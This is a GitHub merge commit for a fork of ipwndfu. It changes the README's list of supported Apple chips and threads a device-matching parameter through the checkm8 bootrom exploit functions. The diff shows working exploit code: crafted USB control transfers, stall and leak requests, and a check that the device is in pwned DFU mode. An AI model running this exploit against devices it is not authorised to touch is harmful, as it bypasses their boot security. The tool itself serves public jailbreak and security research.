Merge pull request #3 from cxnder/master

[WIP] Myriad changes, see comments
hack-different · Feb 15, 2022 · 50daf55 · 50daf55
2 parents a43cd5d + 87b5ee3
commit 50daf55
Show file tree

Hide file tree

Showing 5 changed files with 629 additions and 523 deletions.
diff --git a/README.md b/README.md
@@ -8,10 +8,7 @@
 
 ## About this fork
 
-This fork only supports the t8012 chip. It is based on
-[LinusHenze's ipwndfu patches](https://github.com/LinusHenze/ipwndfu_public), which allow it to boot iBoot without
-destroying the heap. A simple patch that allows you to boot any extracted iBoot image (without the img4 wrapper) is
-provided in `nop_image4.py`, which was based on LinusHenze's `rmsigchks.py`.
+This fork is maintained by the hack-different team and is gladly accepting PRs from the wider community.
 
 ## checkm8
 
@@ -21,9 +18,9 @@ provided in `nop_image4.py`, which was based on LinusHenze's `rmsigchks.py`.
 
 * allows dumping SecureROM, decrypting keybags for iOS firmware, and demoting device for JTAG
 
-* current SoC support: s5l8947x, s5l8950x, s5l8955x, s5l8960x, t8002, t8004, t8010, t8011, t8015
+* current SoC support: s5l8947x, s5l8950x, s5l8955x, s5l8960x, t7000, s8000, t8002, s8003, t8004, t8010, t8011, t8012, t8015
 
-* future SoC support: s5l8940x, s5l8942x, s5l8945x, s5l8747x, t7000, t7001, s7002, s8000, s8001, s8003, t8012
+* future SoC support: s5l8940x, s5l8942x, s5l8945x, s5l8747x, t7001, s7002, s8001
 
 * full jailbreak with Cydia on latest iOS version is possible, but requires additional work
 
@@ -39,6 +36,13 @@ provided in `nop_image4.py`, which was based on LinusHenze's `rmsigchks.py`.
 
 5. Run ```./ipwndfu --demote``` to demote device and enable JTAG.
 
+## About this fork (addendum)
+
+This fork supports the t8012 chip. It is based on
+[LinusHenze's ipwndfu patches](https://github.com/LinusHenze/ipwndfu_public), which allow it to boot iBoot without
+destroying the heap. A simple patch that allows you to boot any extracted iBoot image (without the img4 wrapper) is
+provided in `nop_image4.py`, which was based on LinusHenze's `rmsigchks.py`.
+
 ## Features
 
 * Jailbreak and downgrade iPhone 3GS (new bootrom) with alloc8 untethered bootrom exploit. :-)

diff --git a/checkm8.py b/checkm8.py
@@ -626,10 +626,10 @@ def exploit_config(serial_number):
     sys.exit(1)
 
 
-def exploit():
+def exploit(match=None):
     print('*** checkm8 exploit by axi0mX ***')
 
-    device = dfu.acquire_device()
+    device = dfu.acquire_device(match=match)
     start = time.time()
     print('Found:', device.serial_number)
     if 'PWND:[' in device.serial_number:
@@ -651,7 +651,7 @@ def exploit():
     dfu.usb_reset(device)
     dfu.release_device(device)
 
-    device = dfu.acquire_device()
+    device = dfu.acquire_device(match=match)
     device.serial_number
     libusb1_async_ctrl_transfer(device, 0x21, 1, 0, 0, 'A' * 0x800, 0.0001)
 
@@ -662,7 +662,7 @@ def exploit():
 
     time.sleep(0.8)
 
-    device = dfu.acquire_device()
+    device = dfu.acquire_device(match=match)
     usb_req_stall(device)
     if config.large_leak is not None:
         usb_req_leak(device)
@@ -675,18 +675,18 @@ def exploit():
     dfu.usb_reset(device)
     dfu.release_device(device)
 
-    device = dfu.acquire_device()
+    device = dfu.acquire_device(match=match)
     if 'PWND:[checkm8]' not in device.serial_number:
         print('ERROR: Exploit failed. Device did not enter pwned DFU Mode.')
         sys.exit(1)
     print('Device is now in pwned DFU Mode.')
     print('(%0.2f seconds)' % (time.time() - start))
     dfu.release_device(device)
 
-def exploit_a8_a9():
+def exploit_a8_a9(match=None):
   print('*** checkm8 exploit by axi0mX ***')
 
-  device = dfu.acquire_device()
+  device = dfu.acquire_device(match=match)
   start = time.time()
   print('Found:', device.serial_number)
   if 'PWND:[' in device.serial_number:
@@ -707,7 +707,7 @@ def exploit_a8_a9():
   dfu.usb_reset(device)
   dfu.release_device(device)
 
-  device = dfu.acquire_device()
+  device = dfu.acquire_device(match=match)
   device.serial_number
   libusb1_async_ctrl_transfer(device, 0x21, 1, 0, 0, 'A' * 0x800, 0.0001)
   libusb1_no_error_ctrl_transfer(device, 0, 0, 0, 0, 'A' * padding, 10)
@@ -716,7 +716,7 @@ def exploit_a8_a9():
 
   time.sleep(0.5)
 
-  device = dfu.acquire_device()
+  device = dfu.acquire_device(match=match)
   usb_req_stall(device)
   usb_req_leak(device)
   usb_req_leak(device)
@@ -727,7 +727,7 @@ def exploit_a8_a9():
   dfu.usb_reset(device)
   dfu.release_device(device)
 
-  device = dfu.acquire_device()
+  device = dfu.acquire_device(match=match)
   if 'PWND:[checkm8]' not in device.serial_number:
     print('ERROR: Exploit failed. Device did not enter pwned DFU Mode.')
     sys.exit(1)